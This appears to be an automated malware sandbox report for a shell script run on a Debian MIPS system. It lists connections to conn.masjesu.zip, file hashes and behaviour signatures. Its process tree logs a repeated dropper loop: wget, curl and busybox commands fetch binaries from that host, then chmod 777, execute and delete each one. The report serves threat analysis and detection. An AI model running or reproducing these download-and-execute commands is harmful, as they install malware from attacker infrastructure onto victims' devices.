| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:20
Reported
2024-10-28 02:23
Platform
debian9-mipsel-20240611-en
Max time kernel
90s
Max time network
119s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | N/A |
| N/A | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | N/A |
| N/A | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | N/A |
| N/A | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | N/A |
| N/A | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | N/A |
| N/A | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | N/A |
| N/A | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | N/A |
| N/A | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | N/A |
| N/A | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | N/A |
| N/A | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | N/A |
| N/A | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | N/A |
| N/A | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | N/A |
| N/A | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | N/A |
| N/A | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | N/A |
| N/A | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | N/A |
| N/A | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | N/A |
| N/A | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | N/A |
| N/A | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | N/A |
| N/A | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | N/A |
| N/A | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | N/A |
| N/A | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | N/A |
| N/A | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | N/A |
| N/A | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | N/A |
| N/A | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | N/A |
| N/A | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | N/A |
| N/A | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | N/A |
| N/A | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | N/A |
| N/A | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /usr/bin/curl | N/A |
| File opened for modification | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /usr/bin/curl | N/A |
Processes
/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/chmod
[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/rm
[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/chmod
[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd
[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/rm
[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/chmod
[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/rm
[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/chmod
[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/rm
[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/chmod
[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme
[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/rm
[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/chmod
[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc
[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/rm
[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/chmod
[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB
[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/rm
[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/chmod
[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N
[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/rm
[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/chmod
[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS
[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/rm
